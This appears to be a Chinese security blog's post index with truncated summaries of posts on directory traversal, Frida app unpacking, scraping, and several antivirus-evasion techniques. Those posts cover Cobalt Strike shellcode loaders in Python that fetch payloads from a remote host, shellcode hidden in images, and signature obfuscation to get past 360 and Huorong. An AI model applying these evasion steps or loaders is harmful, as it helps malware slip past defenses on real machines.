2022年2月21日
目录遍历学习
摘要: #conding:utf-8 import requests import sys #加载字典文件 #使用with .. as ..会自动关闭文件流;使用f = open(“filename.txt”,”r”) 需要close关闭文件流。 #每次读取1行 f.readline() #一次读取完 f. 阅读全文
posted @ 2022-02-21 17:33 bingtanghulu 阅读(70) 评论(0) 推荐(0)
2022年1月4日
GShark部署
摘要: 工具地址。https://github.com/madneal/gshark 下载最新版本 1、安装mysql brew install mysql mysql.server start 初始化的命令 : mysql_secure_installation 输入密码 进行配置 2、安装nginx b 阅读全文
posted @ 2022-01-04 22:11 bingtanghulu 阅读(1691) 评论(0) 推荐(0)
2021年12月12日
app脱壳
摘要: 1、查壳工具 链接: https://pan.baidu.com/s/1F4VdYAbAASTq2MZyGDu_CQ 提取码: ki37 2、安装frida pip3 install frida pip3 install frida-tools 安装FRIDA-DEXDump git clone h 阅读全文
posted @ 2021-12-12 19:39 bingtanghulu 阅读(972) 评论(0) 推荐(0)
2021年10月6日
爬虫练习
摘要: #豆瓣电影 re爬虫import requests,re,csv url = "https://movie.douban.com/top250" headers={ "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0 阅读全文
posted @ 2021-10-06 21:53 bingtanghulu 阅读(121) 评论(0) 推荐(0)
2021年9月15日
图片免杀
摘要: 地址 https://github.com/Hangingsword/HouQing 修改key 生成shellcode 将生成的shellcode放入code.go 写入图片 go run code.go 11.jpeg 将11.jpeg放入vps 执行命令 开启web服务 python -m S 阅读全文
posted @ 2021-09-15 18:12 bingtanghulu 阅读(32) 评论(0) 推荐(0)
2021年8月15日
charlotte工具免杀(过360,腾讯,火绒)
摘要: 1.使用cs生成bin文件 2.下载工具 https://github.com/9emin1/charlotte 安装mingw-w64* yum install mingw-w64* mac使用 brew install mingw-w64 3.修改payload.bin改名为beacon.bin 阅读全文
posted @ 2021-08-15 00:45 bingtanghulu 阅读(248) 评论(0) 推荐(0)
2021年8月14日
常用过火绒,360,powershell加载器
摘要: 1. import ctypes import base64 import requests #shell需要先进行base64加密,再进行hex加密 code = requests.get("http://192.168.1.1/123.txt") shellcode = bytearray(ba 阅读全文
posted @ 2021-08-14 21:24 bingtanghulu 阅读(35) 评论(0) 推荐(0)
python shellcod加载器修改特征值
摘要: 首先网上找一个加载器 pyinstaller -F -w 1.py 进行打包,使用火绒或者360检测 分步排查 每次增加几行代码,逐步找到特征值 找到特征码 分字符函数进行排查,确定字符RltMoveMemory为特征值 RtlMoveMemory作用为从指定内存中复制内存至另一内存里 此时进行混淆 阅读全文
posted @ 2021-08-14 20:37 bingtanghulu 阅读(318) 评论(0) 推荐(0)
python shellcode免杀(过最新360,火绒,不过最新的windows))
摘要: 第一步cs生成python版测shellcode 第二步 提取双引号内容,并进行base64编码,放入python04.TXT 第三步 shellcode加载器修改地址,并进行base64加密,放入pythonshellcode.txt。同时将pythonshellcode.txt和python04 阅读全文
posted @ 2021-08-14 15:41 bingtanghulu 阅读(60) 评论(0) 推荐(0)
python shellcode 分析二
摘要: https://forum.90sec.com/t/topic/1587 分析shellcode 将shellcode生成后,使用base64编码,放入buf。将代码写入内存,所以需要将代码解码并转为字节类型。在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为cty 阅读全文
posted @ 2021-08-14 14:35 bingtanghulu 阅读(121) 评论(0) 推荐(0)
下一页